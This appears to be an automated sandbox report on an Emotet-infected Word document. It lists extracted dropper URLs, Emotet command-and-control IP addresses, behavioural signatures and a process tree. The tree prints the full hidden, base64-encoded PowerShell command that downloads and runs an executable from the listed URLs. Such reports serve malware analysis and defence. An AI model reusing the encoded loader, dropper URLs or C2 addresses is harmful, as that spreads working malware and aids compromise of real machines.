Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    13-12-2019 20:52

General

  • Target

    36051a2669ce1b7356a9508821940136abf4aa40305450f6afa2aada9194ae8b.doc

  • Sample

    191213-ef6k96t9yx

  • SHA256

    36051a2669ce1b7356a9508821940136abf4aa40305450f6afa2aada9194ae8b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://sm-conference.info/program/yng1l-j6l3m8p-37065190/

exe.dropper

https://dscreationssite.com/Planninginprogress/EZrSNOm/

exe.dropper

https://innovationhackers.com.mx/wiki/8t9c-bi5psx8545-2918/

exe.dropper

http://www.windo360.com/qkoh/z3dec-5lxb-43423/

exe.dropper

http://www.cpawhy.com/wp-admin/8qy5gi4xp-k42nca-661/

Extracted

Family

emotet

C2

108.184.9.44:80

88.247.26.78:80

181.46.176.38:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

46.105.131.68:8080

85.235.219.74:80

37.46.129.215:8080

153.190.41.185:80

115.179.91.58:80

100.38.11.243:80

119.57.36.54:8080

124.150.175.129:8080

139.59.12.63:8080

82.146.55.23:7080

123.142.37.165:80

95.216.212.157:8080

200.41.121.69:443

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\36051a2669ce1b7356a9508821940136abf4aa40305450f6afa2aada9194ae8b.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:5016
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:3760
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABGAGoAcgBkAHMAYQBmAGYAcgBtAGYAPQAnAEwAdgBmAHIAbQBjAGQAcQAnADsAJABBAHkAcgB1AHUAdQB1AGcAYQBsACAAPQAgACcAMQAzACcAOwAkAEsAawBnAGMAcgBpAGwAZgA9ACcATABrAGEAeABwAHkAcgBvACcAOwAkAFEAeQB1AHIAdQByAGEAaAB5AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAeQByAHUAdQB1AHUAZwBhAGwAKwAnAC4AZQB4AGUAJwA7ACQAVABwAHIAaQB6AHAAbwBuAGoAbQB6AD0AJwBOAHMAaQB0AGQAbgBqAGIAYQB0ACcAOwAkAFEAeQB1AG0AcQBiAHAAawB0AGYAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAYwBMAGkARQBOAHQAOwAkAEMAcgBoAHkAdwB6AHgAZAA9ACcAaAB0AHQAcAA6AC8ALwBzAG0ALQBjAG8AbgBmAGUAcgBlAG4AYwBlAC4AaQBuAGYAbwAvAHAAcgBvAGcAcgBhAG0ALwB5AG4AZwAxAGwALQBqADYAbAAzAG0AOABwAC0AMwA3ADAANgA1ADEAOQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AZABzAGMAcgBlAGEAdABpAG8AbgBzAHMAaQB0AGUALgBjAG8AbQAvAFAAbABhAG4AbgBpAG4AZwBpAG4AcAByAG8AZwByAGUAcwBzAC8ARQBaAHIAUwBOAE8AbQAvACoAaAB0AHQAcABzADoALwAvAGkAbgBuAG8AdgBhAHQAaQBvAG4AaABhAGMAawBlAHIAcwAuAGMAbwBtAC4AbQB4AC8AdwBpAGsAaQAvADgAdAA5AGMALQBiAGkANQBwAHMAeAA4ADUANAA1AC0AMgA5ADEAOAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAaQBuAGQAbwAzADYAMAAuAGMAbwBtAC8AcQBrAG8AaAAvAHoAMwBkAGUAYwAtADUAbAB4AGIALQA0ADMANAAyADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBjAHAAYQB3AGgAeQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AOABxAHkANQBnAGkANAB4AHAALQBrADQAMgBuAGMAYQAtADYANgAxAC8AJwAuACIAUwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAEwAZQB1AHgAZABsAGIAaAA9ACcAVQBzAHkAZABjAHUAeAB3AHYAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwB1AGIAYQBrAGsAYQBjAGIAZQBhAHcAbAAgAGkAbgAgACQAQwByAGgAeQB3AHoAeABkACkAewB0AHIAeQB7ACQAUQB5AHUAbQBxAGIAcABrAHQAZgAuACIARABgAG8AVwBuAEwAbwBBAEQARgBgAEkAbABFACIAKAAkAFMAdQBiAGEAawBrAGEAYwBiAGUAYQB3AGwALAAgACQAUQB5AHUAcgB1AHIAYQBoAHkAeAApADsAJABOAGUAZwBlAG4AYgBqAG0APQAnAFMAaQBvAGsAdQBwAGYAYgB5AHgAdwBjAHkAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAHkAdQByAHUAcgBhAGgAeQB4ACkALgAiAGwAZQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADUANQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgB0ACIAKAAkAFEAeQB1AHIAdQByAGEAaAB5AHgAKQA7ACQASwBvAGQAZAB4AHUAdQBrAD0AJwBSAHoAeAB6AHkAYQByAHgAegBxAHAAJwA7AGIAcgBlAGEAawA7ACQASQBxAHUAZgBpAGUAawBmAD0AJwBOAHEAdQBqAHAAegB4AG8AZABzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAZAB5AHoAdwBsAGEAcQBmAGwAcwBvAHUAPQAnAFAAbABmAGcAawBiAHEAawAnAA==
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4724
      • C:\Users\Admin\13.exe
        "C:\Users\Admin\13.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4424
        • C:\Users\Admin\13.exe
          --cfd28cac
          3⤵
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:4816
    • C:\Windows\SysWOW64\serialprint.exe
      "C:\Windows\SysWOW64\serialprint.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:4344
      • C:\Windows\SysWOW64\serialprint.exe
        --68163daf
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4272

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4272-15-0x0000000000E00000-0x0000000000E17000-memory.dmp

      Filesize

      92KB

    • memory/4272-16-0x0000000000400000-0x0000000000483000-memory.dmp

      Filesize

      524KB

    • memory/4344-13-0x0000000000DF0000-0x0000000000E07000-memory.dmp

      Filesize

      92KB

    • memory/4424-8-0x0000000000660000-0x0000000000677000-memory.dmp

      Filesize

      92KB

    • memory/4816-10-0x0000000000710000-0x0000000000727000-memory.dmp

      Filesize

      92KB

    • memory/4816-11-0x0000000000400000-0x0000000000483000-memory.dmp

      Filesize

      524KB